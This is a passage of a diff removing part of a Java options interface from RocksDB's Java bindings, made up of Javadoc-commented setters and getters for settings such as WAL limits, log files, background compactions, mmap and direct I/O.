-   * bottlenecked by RocksDB.</p>
-   *
-   * @param totalThreads The total number of threads to be used by RocksDB.
-   *     A good value is the number of cores.
-   *
-   * @return the instance of the current Options
-   */
-  T setIncreaseParallelism(int totalThreads);
-
-  /**
-   * If this value is set to true, then the database will be created
-   * if it is missing during {@code RocksDB.open()}.
-   * Default: false
-   *
-   * @param flag a flag indicating whether to create a database the
-   *     specified database in {@link RocksDB#open(org.rocksdb.Options, String)} operation
-   *     is missing.
-   * @return the instance of the current Options
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setCreateIfMissing(boolean flag);
-
-  /**
-   * Return true if the create_if_missing flag is set to true.
-   * If true, the database will be created if it is missing.
-   *
-   * @return true if the createIfMissing option is set to true.
-   * @see #setCreateIfMissing(boolean)
-   */
-  boolean createIfMissing();
-
-  /**
-   * <p>If true, missing column families will be automatically created</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @param flag a flag indicating if missing column families shall be
-   *     created automatically.
-   * @return true if missing column families shall be created automatically
-   *     on open.
-   */
-  T setCreateMissingColumnFamilies(boolean flag);
-
-  /**
-   * Return true if the create_missing_column_families flag is set
-   * to true. If true column families be created if missing.
-   *
-   * @return true if the createMissingColumnFamilies is set to
-   *     true.
-   * @see #setCreateMissingColumnFamilies(boolean)
-   */
-  boolean createMissingColumnFamilies();
-
-  /**
-   * If true, an error will be thrown during RocksDB.open() if the
-   * database already exists.
-   * Default: false
-   *
-   * @param errorIfExists if true, an exception will be thrown
-   *     during {@code RocksDB.open()} if the database already exists.
-   * @return the reference to the current option.
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setErrorIfExists(boolean errorIfExists);
-
-  /**
-   * If true, an error will be thrown during RocksDB.open() if the
-   * database already exists.
-   *
-   * @return if true, an error is raised when the specified database
-   *    already exists before open.
-   */
-  boolean errorIfExists();
-
-  /**
-   * If true, the implementation will do aggressive checking of the
-   * data it is processing and will stop early if it detects any
-   * errors.  This may have unforeseen ramifications: for example, a
-   * corruption of one DB entry may cause a large number of entries to
-   * become unreadable or for the entire DB to become unopenable.
-   * If any of the  writes to the database fails (Put, Delete, Merge, Write),
-   * the database will switch to read-only mode and fail all other
-   * Write operations.
-   * Default: true
-   *
-   * @param paranoidChecks a flag to indicate whether paranoid-check
-   *     is on.
-   * @return the reference to the current option.
-   */
-  T setParanoidChecks(boolean paranoidChecks);
-
-  /**
-   * If true, the implementation will do aggressive checking of the
-   * data it is processing and will stop early if it detects any
-   * errors.  This may have unforeseen ramifications: for example, a
-   * corruption of one DB entry may cause a large number of entries to
-   * become unreadable or for the entire DB to become unopenable.
-   * If any of the  writes to the database fails (Put, Delete, Merge, Write),
-   * the database will switch to read-only mode and fail all other
-   * Write operations.
-   *
-   * @return a boolean indicating whether paranoid-check is on.
-   */
-  boolean paranoidChecks();
-
-  /**
-   * Use to control write rate of flush and compaction. Flush has higher
-   * priority than compaction. Rate limiting is disabled if nullptr.
-   * Default: nullptr
-   *
-   * @param rateLimiter {@link org.rocksdb.RateLimiter} instance.
-   * @return the instance of the current object.
-   *
-   * @since 3.10.0
-   */
-  T setRateLimiter(RateLimiter rateLimiter);
-
-  /**
-   * <p>Any internal progress/error information generated by
-   * the db will be written to the Logger if it is non-nullptr,
-   * or to a file stored in the same directory as the DB
-   * contents if info_log is nullptr.</p>
-   *
-   * <p>Default: nullptr</p>
-   *
-   * @param logger {@link Logger} instance.
-   * @return the instance of the current object.
-   */
-  T setLogger(Logger logger);
-
-  /**
-   * <p>Sets the RocksDB log level. Default level is INFO</p>
-   *
-   * @param infoLogLevel log level to set.
-   * @return the instance of the current object.
-   */
-  T setInfoLogLevel(InfoLogLevel infoLogLevel);
-
-  /**
-   * <p>Returns currently set log level.</p>
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  InfoLogLevel infoLogLevel();
-
-  /**
-   * Number of open files that can be used by the DB.  You may need to
-   * increase this if your database has a large working set. Value -1 means
-   * files opened are always kept open. You can estimate number of files based
-   * on {@code target_file_size_base} and {@code target_file_size_multiplier}
-   * for level-based compaction. For universal-style compaction, you can usually
-   * set it to -1.
-   * Default: 5000
-   *
-   * @param maxOpenFiles the maximum number of open files.
-   * @return the instance of the current object.
-   */
-  T setMaxOpenFiles(int maxOpenFiles);
-
-  /**
-   * Number of open files that can be used by the DB.  You may need to
-   * increase this if your database has a large working set. Value -1 means
-   * files opened are always kept open. You can estimate number of files based
-   * on {@code target_file_size_base} and {@code target_file_size_multiplier}
-   * for level-based compaction. For universal-style compaction, you can usually
-   * set it to -1.
-   *
-   * @return the maximum number of open files.
-   */
-  int maxOpenFiles();
-
-  /**
-   * If {@link #maxOpenFiles()} is -1, DB will open all files on DB::Open(). You
-   * can use this option to increase the number of threads used to open the
-   * files.
-   *
-   * Default: 16
-   *
-   * @param maxFileOpeningThreads the maximum number of threads to use to
-   *     open files
-   *
-   * @return the reference to the current options.
-   */
-  T setMaxFileOpeningThreads(int maxFileOpeningThreads);
-
-  /**
-   * If {@link #maxOpenFiles()} is -1, DB will open all files on DB::Open(). You
-   * can use this option to increase the number of threads used to open the
-   * files.
-   *
-   * Default: 16
-   *
-   * @return the maximum number of threads to use to open files
-   */
-  int maxFileOpeningThreads();
-
-  /**
-   * <p>Once write-ahead logs exceed this size, we will start forcing the
-   * flush of column families whose memtables are backed by the oldest live
-   * WAL file (i.e. the ones that are causing all the space amplification).
-   * </p>
-   * <p>If set to 0 (default), we will dynamically choose the WAL size limit to
-   * be [sum of all write_buffer_size * max_write_buffer_number] * 2</p>
-   * <p>Default: 0</p>
-   *
-   * @param maxTotalWalSize max total wal size.
-   * @return the instance of the current object.
-   */
-  T setMaxTotalWalSize(long maxTotalWalSize);
-
-  /**
-   * <p>Returns the max total wal size. Once write-ahead logs exceed this size,
-   * we will start forcing the flush of column families whose memtables are
-   * backed by the oldest live WAL file (i.e. the ones that are causing all
-   * the space amplification).</p>
-   *
-   * <p>If set to 0 (default), we will dynamically choose the WAL size limit
-   * to be [sum of all write_buffer_size * max_write_buffer_number] * 2
-   * </p>
-   *
-   * @return max total wal size
-   */
-  long maxTotalWalSize();
-
-  /**
-   * <p>Sets the statistics object which collects metrics about database operations.
-   * Statistics objects should not be shared between DB instances as
-   * it does not use any locks to prevent concurrent updates.</p>
-   *
-   * @return the instance of the current object.
-   * @see RocksDB#open(org.rocksdb.Options, String)
-   */
-  T setStatistics(final Statistics statistics);
-
-  /**
-   * <p>Returns statistics object.</p>
-   *
-   * @return the instance of the statistics object or null if there is no statistics object.
-   * @see #setStatistics(Statistics)
-   */
-  Statistics statistics();
-
-  /**
-   * <p>If true, then every store to stable storage will issue a fsync.</p>
-   * <p>If false, then every store to stable storage will issue a fdatasync.
-   * This parameter should be set to true while storing data to
-   * filesystem like ext3 that can lose files after a reboot.</p>
-   * <p>Default: false</p>
-   *
-   * @param useFsync a boolean flag to specify whether to use fsync
-   * @return the instance of the current object.
-   */
-  T setUseFsync(boolean useFsync);
-
-  /**
-   * <p>If true, then every store to stable storage will issue a fsync.</p>
-   * <p>If false, then every store to stable storage will issue a fdatasync.
-   * This parameter should be set to true while storing data to
-   * filesystem like ext3 that can lose files after a reboot.</p>
-   *
-   * @return boolean value indicating if fsync is used.
-   */
-  boolean useFsync();
-
-  /**
-   * A list of paths where SST files can be put into, with its target size.
-   * Newer data is placed into paths specified earlier in the vector while
-   * older data gradually moves to paths specified later in the vector.
-   *
-   * For example, you have a flash device with 10GB allocated for the DB,
-   * as well as a hard drive of 2TB, you should config it to be:
-   *    [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-   *
-   * The system will try to guarantee data under each path is close to but
-   * not larger than the target size. But current and future file sizes used
-   * by determining where to place a file are based on best-effort estimation,
-   * which means there is a chance that the actual size under the directory
-   * is slightly more than target size under some workloads. User should give
-   * some buffer room for those cases.
-   *
-   * If none of the paths has sufficient room to place a file, the file will
-   * be placed to the last path anyway, despite to the target size.
-   *
-   * Placing newer data to earlier paths is also best-efforts. User should
-   * expect user files to be placed in higher levels in some extreme cases.
-   *
-   * If left empty, only one path will be used, which is db_name passed when
-   * opening the DB.
-   *
-   * Default: empty
-   *
-   * @param dbPaths the paths and target sizes
-   *
-   * @return the reference to the current options
-   */
-  T setDbPaths(final Collection<DbPath> dbPaths);
-
-  /**
-   * A list of paths where SST files can be put into, with its target size.
-   * Newer data is placed into paths specified earlier in the vector while
-   * older data gradually moves to paths specified later in the vector.
-   *
-   * For example, you have a flash device with 10GB allocated for the DB,
-   * as well as a hard drive of 2TB, you should config it to be:
-   *    [{"/flash_path", 10GB}, {"/hard_drive", 2TB}]
-   *
-   * The system will try to guarantee data under each path is close to but
-   * not larger than the target size. But current and future file sizes used
-   * by determining where to place a file are based on best-effort estimation,
-   * which means there is a chance that the actual size under the directory
-   * is slightly more than target size under some workloads. User should give
-   * some buffer room for those cases.
-   *
-   * If none of the paths has sufficient room to place a file, the file will
-   * be placed to the last path anyway, despite to the target size.
-   *
-   * Placing newer data to earlier paths is also best-efforts. User should
-   * expect user files to be placed in higher levels in some extreme cases.
-   *
-   * If left empty, only one path will be used, which is db_name passed when
-   * opening the DB.
-   *
-   * Default: {@link java.util.Collections#emptyList()}
-   *
-   * @return dbPaths the paths and target sizes
-   */
-  List<DbPath> dbPaths();
-
-  /**
-   * This specifies the info LOG dir.
-   * If it is empty, the log files will be in the same dir as data.
-   * If it is non empty, the log files will be in the specified dir,
-   * and the db data dir's absolute path will be used as the log file
-   * name's prefix.
-   *
-   * @param dbLogDir the path to the info log directory
-   * @return the instance of the current object.
-   */
-  T setDbLogDir(String dbLogDir);
-
-  /**
-   * Returns the directory of info log.
-   *
-   * If it is empty, the log files will be in the same dir as data.
-   * If it is non empty, the log files will be in the specified dir,
-   * and the db data dir's absolute path will be used as the log file
-   * name's prefix.
-   *
-   * @return the path to the info log directory
-   */
-  String dbLogDir();
-
-  /**
-   * This specifies the absolute dir path for write-ahead logs (WAL).
-   * If it is empty, the log files will be in the same dir as data,
-   *   dbname is used as the data dir by default
-   * If it is non empty, the log files will be in kept the specified dir.
-   * When destroying the db,
-   *   all log files in wal_dir and the dir itself is deleted
-   *
-   * @param walDir the path to the write-ahead-log directory.
-   * @return the instance of the current object.
-   */
-  T setWalDir(String walDir);
-
-  /**
-   * Returns the path to the write-ahead-logs (WAL) directory.
-   *
-   * If it is empty, the log files will be in the same dir as data,
-   *   dbname is used as the data dir by default
-   * If it is non empty, the log files will be in kept the specified dir.
-   * When destroying the db,
-   *   all log files in wal_dir and the dir itself is deleted
-   *
-   * @return the path to the write-ahead-logs (WAL) directory.
-   */
-  String walDir();
-
-  /**
-   * The periodicity when obsolete files get deleted. The default
-   * value is 6 hours. The files that get out of scope by compaction
-   * process will still get automatically delete on every compaction,
-   * regardless of this setting
-   *
-   * @param micros the time interval in micros
-   * @return the instance of the current object.
-   */
-  T setDeleteObsoleteFilesPeriodMicros(long micros);
-
-  /**
-   * The periodicity when obsolete files get deleted. The default
-   * value is 6 hours. The files that get out of scope by compaction
-   * process will still get automatically delete on every compaction,
-   * regardless of this setting
-   *
-   * @return the time interval in micros when obsolete files will be deleted.
-   */
-  long deleteObsoleteFilesPeriodMicros();
-
-  /**
-   * Suggested number of concurrent background compaction jobs, submitted to
-   * the default LOW priority thread pool.
-   * Default: 1
-   *
-   * @param baseBackgroundCompactions Suggested number of background compaction
-   *     jobs
-   */
-  void setBaseBackgroundCompactions(int baseBackgroundCompactions);
-
-  /**
-   * Suggested number of concurrent background compaction jobs, submitted to
-   * the default LOW priority thread pool.
-   * Default: 1
-   *
-   * @return Suggested number of background compaction jobs
-   */
-  int baseBackgroundCompactions();
-
-  /**
-   * Specifies the maximum number of concurrent background compaction jobs,
-   * submitted to the default LOW priority thread pool.
-   * If you're increasing this, also consider increasing number of threads in
-   * LOW priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @param maxBackgroundCompactions the maximum number of background
-   *     compaction jobs.
-   * @return the instance of the current object.
-   *
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   * @see #maxBackgroundFlushes()
-   */
-  T setMaxBackgroundCompactions(int maxBackgroundCompactions);
-
-  /**
-   * Returns the maximum number of concurrent background compaction jobs,
-   * submitted to the default LOW priority thread pool.
-   * When increasing this number, we may also want to consider increasing
-   * number of threads in LOW priority thread pool.
-   * Default: 1
-   *
-   * @return the maximum number of concurrent background compaction jobs.
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   */
-  int maxBackgroundCompactions();
-
-  /**
-   * This value represents the maximum number of threads that will
-   * concurrently perform a compaction job by breaking it into multiple,
-   * smaller ones that are run simultaneously.
-   * Default: 1 (i.e. no subcompactions)
-   *
-   * @param maxSubcompactions The maximum number of threads that will
-   *     concurrently perform a compaction job
-   */
-  void setMaxSubcompactions(int maxSubcompactions);
-
-  /**
-   * This value represents the maximum number of threads that will
-   * concurrently perform a compaction job by breaking it into multiple,
-   * smaller ones that are run simultaneously.
-   * Default: 1 (i.e. no subcompactions)
-   *
-   * @return The maximum number of threads that will concurrently perform a
-   *     compaction job
-   */
-  int maxSubcompactions();
-
-  /**
-   * Specifies the maximum number of concurrent background flush jobs.
-   * If you're increasing this, also consider increasing number of threads in
-   * HIGH priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @param maxBackgroundFlushes number of max concurrent flush jobs
-   * @return the instance of the current object.
-   *
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   * @see #maxBackgroundCompactions()
-   */
-  T setMaxBackgroundFlushes(int maxBackgroundFlushes);
-
-  /**
-   * Returns the maximum number of concurrent background flush jobs.
-   * If you're increasing this, also consider increasing number of threads in
-   * HIGH priority thread pool. For more information, see
-   * Default: 1
-   *
-   * @return the maximum number of concurrent background flush jobs.
-   * @see RocksEnv#setBackgroundThreads(int)
-   * @see RocksEnv#setBackgroundThreads(int, int)
-   */
-  int maxBackgroundFlushes();
-
-  /**
-   * Specifies the maximum size of a info log file. If the current log file
-   * is larger than `max_log_file_size`, a new info log file will
-   * be created.
-   * If 0, all logs will be written to one log file.
-   *
-   * @param maxLogFileSize the maximum size of a info log file.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMaxLogFileSize(long maxLogFileSize);
-
-  /**
-   * Returns the maximum size of a info log file. If the current log file
-   * is larger than this size, a new info log file will be created.
-   * If 0, all logs will be written to one log file.
-   *
-   * @return the maximum size of the info log file.
-   */
-  long maxLogFileSize();
-
-  /**
-   * Specifies the time interval for the info log file to roll (in seconds).
-   * If specified with non-zero value, log file will be rolled
-   * if it has been active longer than `log_file_time_to_roll`.
-   * Default: 0 (disabled)
-   *
-   * @param logFileTimeToRoll the time interval in seconds.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setLogFileTimeToRoll(long logFileTimeToRoll);
-
-  /**
-   * Returns the time interval for the info log file to roll (in seconds).
-   * If specified with non-zero value, log file will be rolled
-   * if it has been active longer than `log_file_time_to_roll`.
-   * Default: 0 (disabled)
-   *
-   * @return the time interval in seconds.
-   */
-  long logFileTimeToRoll();
-
-  /**
-   * Specifies the maximum number of info log files to be kept.
-   * Default: 1000
-   *
-   * @param keepLogFileNum the maximum number of info log files to be kept.
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setKeepLogFileNum(long keepLogFileNum);
-
-  /**
-   * Returns the maximum number of info log files to be kept.
-   * Default: 1000
-   *
-   * @return the maximum number of info log files to be kept.
-   */
-  long keepLogFileNum();
-
-  /**
-   * Recycle log files.
-   *
-   * If non-zero, we will reuse previously written log files for new
-   * logs, overwriting the old data.  The value indicates how many
-   * such files we will keep around at any point in time for later
-   * use.
-   *
-   * This is more efficient because the blocks are already
-   * allocated and fdatasync does not need to update the inode after
-   * each write.
-   *
-   * Default: 0
-   *
-   * @param recycleLogFileNum the number of log files to keep for recycling
-   *
-   * @return the reference to the current options
-   */
-  T setRecycleLogFileNum(long recycleLogFileNum);
-
-  /**
-   * Recycle log files.
-   *
-   * If non-zero, we will reuse previously written log files for new
-   * logs, overwriting the old data.  The value indicates how many
-   * such files we will keep around at any point in time for later
-   * use.
-   *
-   * This is more efficient because the blocks are already
-   * allocated and fdatasync does not need to update the inode after
-   * each write.
-   *
-   * Default: 0
-   *
-   * @return the number of log files kept for recycling
-   */
-  long recycleLogFileNum();
-
-  /**
-   * Manifest file is rolled over on reaching this limit.
-   * The older manifest file be deleted.
-   * The default value is MAX_INT so that roll-over does not take place.
-   *
-   * @param maxManifestFileSize the size limit of a manifest file.
-   * @return the instance of the current object.
-   */
-  T setMaxManifestFileSize(long maxManifestFileSize);
-
-  /**
-   * Manifest file is rolled over on reaching this limit.
-   * The older manifest file be deleted.
-   * The default value is MAX_INT so that roll-over does not take place.
-   *
-   * @return the size limit of a manifest file.
-   */
-  long maxManifestFileSize();
-
-  /**
-   * Number of shards used for table cache.
-   *
-   * @param tableCacheNumshardbits the number of chards
-   * @return the instance of the current object.
-   */
-  T setTableCacheNumshardbits(int tableCacheNumshardbits);
-
-  /**
-   * Number of shards used for table cache.
-   *
-   * @return the number of shards used for table cache.
-   */
-  int tableCacheNumshardbits();
-
-  /**
-   * {@link #walTtlSeconds()} and {@link #walSizeLimitMB()} affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   * the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @param walTtlSeconds the ttl seconds
-   * @return the instance of the current object.
-   * @see #setWalSizeLimitMB(long)
-   */
-  T setWalTtlSeconds(long walTtlSeconds);
-
-  /**
-   * WalTtlSeconds() and walSizeLimitMB() affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   * the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   * WAL files will be checked every 10 min and if total size is greater
-   * then WAL_size_limit_MB, they will be deleted starting with the
-   * earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   * WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   * are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   * checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @return the wal-ttl seconds
-   * @see #walSizeLimitMB()
-   */
-  long walTtlSeconds();
-
-  /**
-   * WalTtlSeconds() and walSizeLimitMB() affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   *    the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_secondsi / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   *
-   * @param sizeLimitMB size limit in mega-bytes.
-   * @return the instance of the current object.
-   * @see #setWalSizeLimitMB(long)
-   */
-  T setWalSizeLimitMB(long sizeLimitMB);
-
-  /**
-   * {@link #walTtlSeconds()} and {@code #walSizeLimitMB()} affect how archived logs
-   * will be deleted.
-   * <ol>
-   * <li>If both set to 0, logs will be deleted asap and will not get into
-   *    the archive.</li>
-   * <li>If WAL_ttl_seconds is 0 and WAL_size_limit_MB is not 0,
-   *    WAL files will be checked every 10 min and if total size is greater
-   *    then WAL_size_limit_MB, they will be deleted starting with the
-   *    earliest until size_limit is met. All empty files will be deleted.</li>
-   * <li>If WAL_ttl_seconds is not 0 and WAL_size_limit_MB is 0, then
-   *    WAL files will be checked every WAL_ttl_seconds i / 2 and those that
-   *    are older than WAL_ttl_seconds will be deleted.</li>
-   * <li>If both are not 0, WAL files will be checked every 10 min and both
-   *    checks will be performed with ttl being first.</li>
-   * </ol>
-   * @return size limit in mega-bytes.
-   * @see #walSizeLimitMB()
-   */
-  long walSizeLimitMB();
-
-  /**
-   * Number of bytes to preallocate (via fallocate) the manifest
-   * files.  Default is 4mb, which is reasonable to reduce random IO
-   * as well as prevent overallocation for mounts that preallocate
-   * large amounts of data (such as xfs's allocsize option).
-   *
-   * @param size the size in byte
-   * @return the instance of the current object.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setManifestPreallocationSize(long size);
-
-  /**
-   * Number of bytes to preallocate (via fallocate) the manifest
-   * files.  Default is 4mb, which is reasonable to reduce random IO
-   * as well as prevent overallocation for mounts that preallocate
-   * large amounts of data (such as xfs's allocsize option).
-   *
-   * @return size in bytes.
-   */
-  long manifestPreallocationSize();
-
-  /**
-   * Enable the OS to use direct I/O for reading sst tables.
-   * Default: false
-   *
-   * @param useDirectReads if true, then direct read is enabled
-   * @return the instance of the current object.
-   */
-  T setUseDirectReads(boolean useDirectReads);
-
-  /**
-   * Enable the OS to use direct I/O for reading sst tables.
-   * Default: false
-   *
-   * @return if true, then direct reads are enabled
-   */
-  boolean useDirectReads();
-
-  /**
-   * Enable the OS to use direct reads and writes in flush and
-   * compaction
-   * Default: false
-   *
-   * @param useDirectIoForFlushAndCompaction if true, then direct
-   *        I/O will be enabled for background flush and compactions
-   * @return the instance of the current object.
-   */
-  T setUseDirectIoForFlushAndCompaction(boolean useDirectIoForFlushAndCompaction);
-
-  /**
-   * Enable the OS to use direct reads and writes in flush and
-   * compaction
-   *
-   * @return if true, then direct I/O is enabled for flush and
-   *         compaction
-   */
-  boolean useDirectIoForFlushAndCompaction();
-
-  /**
-   * Whether fallocate calls are allowed
-   *
-   * @param allowFAllocate false if fallocate() calls are bypassed
-   *
-   * @return the reference to the current options.
-   */
-  T setAllowFAllocate(boolean allowFAllocate);
-
-  /**
-   * Whether fallocate calls are allowed
-   *
-   * @return false if fallocate() calls are bypassed
-   */
-  boolean allowFAllocate();
-
-  /**
-   * Allow the OS to mmap file for reading sst tables.
-   * Default: false
-   *
-   * @param allowMmapReads true if mmap reads are allowed.
-   * @return the instance of the current object.
-   */
-  T setAllowMmapReads(boolean allowMmapReads);
-
-  /**
-   * Allow the OS to mmap file for reading sst tables.
-   * Default: false
-   *
-   * @return true if mmap reads are allowed.
-   */
-  boolean allowMmapReads();
-
-  /**
-   * Allow the OS to mmap file for writing. Default: false
-   *
-   * @param allowMmapWrites true if mmap writes are allowd.
-   * @return the instance of the current object.
-   */
-  T setAllowMmapWrites(boolean allowMmapWrites);
-
-  /**
-   * Allow the OS to mmap file for writing. Default: false
-   *
-   * @return true if mmap writes are allowed.
-   */
-  boolean allowMmapWrites();
-
-  /**
-   * Disable child process inherit open files. Default: true
-   *
-   * @param isFdCloseOnExec true if child process inheriting open
-   *     files is disabled.
-   * @return the instance of the current object.
-   */
-  T setIsFdCloseOnExec(boolean isFdCloseOnExec);
-
-  /**
-   * Disable child process inherit open files. Default: true
-   *
-   * @return true if child process inheriting open files is disabled.
-   */
-  boolean isFdCloseOnExec();
-
-  /**
-   * if not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-   * Default: 600 (10 minutes)
-   *
-   * @param statsDumpPeriodSec time interval in seconds.
-   * @return the instance of the current object.
-   */
-  T setStatsDumpPeriodSec(int statsDumpPeriodSec);
-
-  /**
-   * If not zero, dump rocksdb.stats to LOG every stats_dump_period_sec
-   * Default: 600 (10 minutes)
-   *
-   * @return time interval in seconds.
-   */
-  int statsDumpPeriodSec();
-
-  /**
-   * If set true, will hint the underlying file system that the file
-   * access pattern is random, when a sst file is opened.
-   * Default: true
-   *
-   * @param adviseRandomOnOpen true if hinting random access is on.
-   * @return the instance of the current object.
-   */
-  T setAdviseRandomOnOpen(boolean adviseRandomOnOpen);
-
-  /**
-   * If set true, will hint the underlying file system that the file
-   * access pattern is random, when a sst file is opened.
-   * Default: true
-   *
-   * @return true if hinting random access is on.
-   */
-  boolean adviseRandomOnOpen();
-
-  /**
-   * Amount of data to build up in memtables across all column
-   * families before writing to disk.
-   *
-   * This is distinct from {@link ColumnFamilyOptions#writeBufferSize()},
-   * which enforces a limit for a single memtable.
-   *
-   * This feature is disabled by default. Specify a non-zero value
-   * to enable it.
-   *
-   * Default: 0 (disabled)
-   *
-   * @param dbWriteBufferSize the size of the write buffer
-   *
-   * @return the reference to the current options.
-   */
-  T setDbWriteBufferSize(long dbWriteBufferSize);
-
-  /**
-   * Amount of data to build up in memtables across all column
-   * families before writing to disk.
-   *
-   * This is distinct from {@link ColumnFamilyOptions#writeBufferSize()},
-   * which enforces a limit for a single memtable.
-   *
-   * This feature is disabled by default. Specify a non-zero value
-   * to enable it.
-   *
-   * Default: 0 (disabled)
-   *
-   * @return the size of the write buffer
-   */
-  long dbWriteBufferSize();
-
-  /**
-   * Specify the file access pattern once a compaction is started.
-   * It will be applied to all input files of a compaction.
-   *
-   * Default: {@link AccessHint#NORMAL}
-   *
-   * @param accessHint The access hint
-   *
-   * @return the reference to the current options.
-   */
-  T setAccessHintOnCompactionStart(final AccessHint accessHint);
-
-  /**
-   * Specify the file access pattern once a compaction is started.
-   * It will be applied to all input files of a compaction.
-   *
-   * Default: {@link AccessHint#NORMAL}
-   *
-   * @return The access hint
-   */
-  AccessHint accessHintOnCompactionStart();
-
-  /**
-   * If true, always create a new file descriptor and new table reader
-   * for compaction inputs. Turn this parameter on may introduce extra
-   * memory usage in the table reader, if it allocates extra memory
-   * for indexes. This will allow file descriptor prefetch options
-   * to be set for compaction input files and not to impact file
-   * descriptors for the same file used by user queries.
-   * Suggest to enable {@link BlockBasedTableConfig#cacheIndexAndFilterBlocks()}
-   * for this mode if using block-based table.
-   *
-   * Default: false
-   *
-   * @param newTableReaderForCompactionInputs true if a new file descriptor and
-   *     table reader should be created for compaction inputs
-   *
-   * @return the reference to the current options.
-   */
-  T setNewTableReaderForCompactionInputs(
-      boolean newTableReaderForCompactionInputs);
-
-  /**
-   * If true, always create a new file descriptor and new table reader
-   * for compaction inputs. Turn this parameter on may introduce extra
-   * memory usage in the table reader, if it allocates extra memory
-   * for indexes. This will allow file descriptor prefetch options
-   * to be set for compaction input files and not to impact file
-   * descriptors for the same file used by user queries.
-   * Suggest to enable {@link BlockBasedTableConfig#cacheIndexAndFilterBlocks()}
-   * for this mode if using block-based table.
-   *
-   * Default: false
-   *
-   * @return true if a new file descriptor and table reader are created for
-   *     compaction inputs
-   */
-  boolean newTableReaderForCompactionInputs();
-
-  /**
-   * If non-zero, we perform bigger reads when doing compaction. If you're
-   * running RocksDB on spinning disks, you should set this to at least 2MB.
-   *
-   * That way RocksDB's compaction is doing sequential instead of random reads.
-   * When non-zero, we also force {@link #newTableReaderForCompactionInputs()}
-   * to true.
-   *
-   * Default: 0
-   *
-   * @param compactionReadaheadSize The compaction read-ahead size
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionReadaheadSize(final long compactionReadaheadSize);
-
-  /**
-   * If non-zero, we perform bigger reads when doing compaction. If you're
-   * running RocksDB on spinning disks, you should set this to at least 2MB.
-   *
-   * That way RocksDB's compaction is doing sequential instead of random reads.
-   * When non-zero, we also force {@link #newTableReaderForCompactionInputs()}
-   * to true.
-   *
-   * Default: 0
-   *
-   * @return The compaction read-ahead size
-   */
-  long compactionReadaheadSize();
-
-  /**
-   * This is a maximum buffer size that is used by WinMmapReadableFile in
-   * unbuffered disk I/O mode. We need to maintain an aligned buffer for
-   * reads. We allow the buffer to grow until the specified value and then
-   * for bigger requests allocate one shot buffers. In unbuffered mode we
-   * always bypass read-ahead buffer at ReadaheadRandomAccessFile
-   * When read-ahead is required we then make use of
-   * {@link #compactionReadaheadSize()} value and always try to read ahead.
-   * With read-ahead we always pre-allocate buffer to the size instead of
-   * growing it up to a limit.
-   *
-   * This option is currently honored only on Windows
-   *
-   * Default: 1 Mb
-   *
-   * Special value: 0 - means do not maintain per instance buffer. Allocate
-   *                per request buffer and avoid locking.
-   *
-   * @param randomAccessMaxBufferSize the maximum size of the random access
-   *     buffer
-   *
-   * @return the reference to the current options.
-   */
-  T setRandomAccessMaxBufferSize(long randomAccessMaxBufferSize);
-
-  /**
-   * This is a maximum buffer size that is used by WinMmapReadableFile in
-   * unbuffered disk I/O mode. We need to maintain an aligned buffer for
-   * reads. We allow the buffer to grow until the specified value and then
-   * for bigger requests allocate one shot buffers. In unbuffered mode we
-   * always bypass read-ahead buffer at ReadaheadRandomAccessFile
-   * When read-ahead is required we then make use of
-   * {@link #compactionReadaheadSize()} value and always try to read ahead.
-   * With read-ahead we always pre-allocate buffer to the size instead of
-   * growing it up to a limit.
-   *
-   * This option is currently honored only on Windows
